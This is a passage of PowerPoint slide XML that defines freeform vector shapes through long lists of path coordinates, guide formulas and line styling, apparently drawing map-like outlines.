                      <a:pt x="23" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="277"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36350" name="Freeform 82"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2968" y="3304"/>
                <a:ext cx="292" cy="232"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 99 w 292"/>
                  <a:gd name="T1" fmla="*/ 62 h 232"/>
                  <a:gd name="T2" fmla="*/ 97 w 292"/>
                  <a:gd name="T3" fmla="*/ 81 h 232"/>
                  <a:gd name="T4" fmla="*/ 113 w 292"/>
                  <a:gd name="T5" fmla="*/ 82 h 232"/>
                  <a:gd name="T6" fmla="*/ 130 w 292"/>
                  <a:gd name="T7" fmla="*/ 67 h 232"/>
                  <a:gd name="T8" fmla="*/ 141 w 292"/>
                  <a:gd name="T9" fmla="*/ 55 h 232"/>
                  <a:gd name="T10" fmla="*/ 163 w 292"/>
                  <a:gd name="T11" fmla="*/ 65 h 232"/>
                  <a:gd name="T12" fmla="*/ 175 w 292"/>
                  <a:gd name="T13" fmla="*/ 62 h 232"/>
                  <a:gd name="T14" fmla="*/ 183 w 292"/>
                  <a:gd name="T15" fmla="*/ 45 h 232"/>
                  <a:gd name="T16" fmla="*/ 198 w 292"/>
                  <a:gd name="T17" fmla="*/ 32 h 232"/>
                  <a:gd name="T18" fmla="*/ 210 w 292"/>
                  <a:gd name="T19" fmla="*/ 20 h 232"/>
                  <a:gd name="T20" fmla="*/ 226 w 292"/>
                  <a:gd name="T21" fmla="*/ 8 h 232"/>
                  <a:gd name="T22" fmla="*/ 235 w 292"/>
                  <a:gd name="T23" fmla="*/ 0 h 232"/>
                  <a:gd name="T24" fmla="*/ 254 w 292"/>
                  <a:gd name="T25" fmla="*/ 5 h 232"/>
                  <a:gd name="T26" fmla="*/ 267 w 292"/>
                  <a:gd name="T27" fmla="*/ 6 h 232"/>
                  <a:gd name="T28" fmla="*/ 275 w 292"/>
                  <a:gd name="T29" fmla="*/ 30 h 232"/>
                  <a:gd name="T30" fmla="*/ 279 w 292"/>
                  <a:gd name="T31" fmla="*/ 59 h 232"/>
                  <a:gd name="T32" fmla="*/ 267 w 292"/>
                  <a:gd name="T33" fmla="*/ 65 h 232"/>
                  <a:gd name="T34" fmla="*/ 263 w 292"/>
                  <a:gd name="T35" fmla="*/ 85 h 232"/>
                  <a:gd name="T36" fmla="*/ 277 w 292"/>
                  <a:gd name="T37" fmla="*/ 92 h 232"/>
                  <a:gd name="T38" fmla="*/ 282 w 292"/>
                  <a:gd name="T39" fmla="*/ 84 h 232"/>
                  <a:gd name="T40" fmla="*/ 289 w 292"/>
                  <a:gd name="T41" fmla="*/ 100 h 232"/>
                  <a:gd name="T42" fmla="*/ 285 w 292"/>
                  <a:gd name="T43" fmla="*/ 108 h 232"/>
                  <a:gd name="T44" fmla="*/ 272 w 292"/>
                  <a:gd name="T45" fmla="*/ 124 h 232"/>
                  <a:gd name="T46" fmla="*/ 244 w 292"/>
                  <a:gd name="T47" fmla="*/ 164 h 232"/>
                  <a:gd name="T48" fmla="*/ 210 w 292"/>
                  <a:gd name="T49" fmla="*/ 198 h 232"/>
                  <a:gd name="T50" fmla="*/ 188 w 292"/>
                  <a:gd name="T51" fmla="*/ 211 h 232"/>
                  <a:gd name="T52" fmla="*/ 177 w 292"/>
                  <a:gd name="T53" fmla="*/ 215 h 232"/>
                  <a:gd name="T54" fmla="*/ 167 w 292"/>
                  <a:gd name="T55" fmla="*/ 214 h 232"/>
                  <a:gd name="T56" fmla="*/ 159 w 292"/>
                  <a:gd name="T57" fmla="*/ 219 h 232"/>
                  <a:gd name="T58" fmla="*/ 142 w 292"/>
                  <a:gd name="T59" fmla="*/ 215 h 232"/>
                  <a:gd name="T60" fmla="*/ 129 w 292"/>
                  <a:gd name="T61" fmla="*/ 215 h 232"/>
                  <a:gd name="T62" fmla="*/ 110 w 292"/>
                  <a:gd name="T63" fmla="*/ 223 h 232"/>
                  <a:gd name="T64" fmla="*/ 92 w 292"/>
                  <a:gd name="T65" fmla="*/ 225 h 232"/>
                  <a:gd name="T66" fmla="*/ 75 w 292"/>
                  <a:gd name="T67" fmla="*/ 221 h 232"/>
                  <a:gd name="T68" fmla="*/ 66 w 292"/>
                  <a:gd name="T69" fmla="*/ 216 h 232"/>
                  <a:gd name="T70" fmla="*/ 61 w 292"/>
                  <a:gd name="T71" fmla="*/ 217 h 232"/>
                  <a:gd name="T72" fmla="*/ 55 w 292"/>
                  <a:gd name="T73" fmla="*/ 195 h 232"/>
                  <a:gd name="T74" fmla="*/ 61 w 292"/>
                  <a:gd name="T75" fmla="*/ 188 h 232"/>
                  <a:gd name="T76" fmla="*/ 55 w 292"/>
                  <a:gd name="T77" fmla="*/ 162 h 232"/>
                  <a:gd name="T78" fmla="*/ 37 w 292"/>
                  <a:gd name="T79" fmla="*/ 122 h 232"/>
                  <a:gd name="T80" fmla="*/ 35 w 292"/>
                  <a:gd name="T81" fmla="*/ 109 h 232"/>
                  <a:gd name="T82" fmla="*/ 43 w 292"/>
                  <a:gd name="T83" fmla="*/ 104 h 232"/>
                  <a:gd name="T84" fmla="*/ 50 w 292"/>
                  <a:gd name="T85" fmla="*/ 116 h 232"/>
                  <a:gd name="T86" fmla="*/ 67 w 292"/>
                  <a:gd name="T87" fmla="*/ 118 h 232"/>
                  <a:gd name="T88" fmla="*/ 82 w 292"/>
                  <a:gd name="T89" fmla="*/ 112 h 232"/>
                  <a:gd name="T90" fmla="*/ 86 w 292"/>
                  <a:gd name="T91" fmla="*/ 75 h 232"/>
                  <a:gd name="T92" fmla="*/ 6 w 292"/>
                  <a:gd name="T93" fmla="*/ 16 h 232"/>
                  <a:gd name="T94" fmla="*/ 0 w 292"/>
                  <a:gd name="T95" fmla="*/ 15 h 232"/>
                  <a:gd name="T96" fmla="*/ 216 w 292"/>
                  <a:gd name="T97" fmla="*/ 152 h 232"/>
                  <a:gd name="T98" fmla="*/ 231 w 292"/>
                  <a:gd name="T99" fmla="*/ 140 h 232"/>
                  <a:gd name="T100" fmla="*/ 237 w 292"/>
                  <a:gd name="T101" fmla="*/ 126 h 232"/>
                  <a:gd name="T102" fmla="*/ 223 w 292"/>
                  <a:gd name="T103" fmla="*/ 115 h 232"/>
                  <a:gd name="T104" fmla="*/ 205 w 292"/>
                  <a:gd name="T105" fmla="*/ 129 h 232"/>
                  <a:gd name="T106" fmla="*/ 208 w 292"/>
                  <a:gd name="T107" fmla="*/ 148 h 232"/>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292"/>
                  <a:gd name="T163" fmla="*/ 0 h 232"/>
                  <a:gd name="T164" fmla="*/ 292 w 292"/>
                  <a:gd name="T165" fmla="*/ 232 h 232"/>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292" h="232">
                    <a:moveTo>
                      <a:pt x="86" y="48"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="90" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="292" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="291" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="188"/>
                    </a:lnTo>
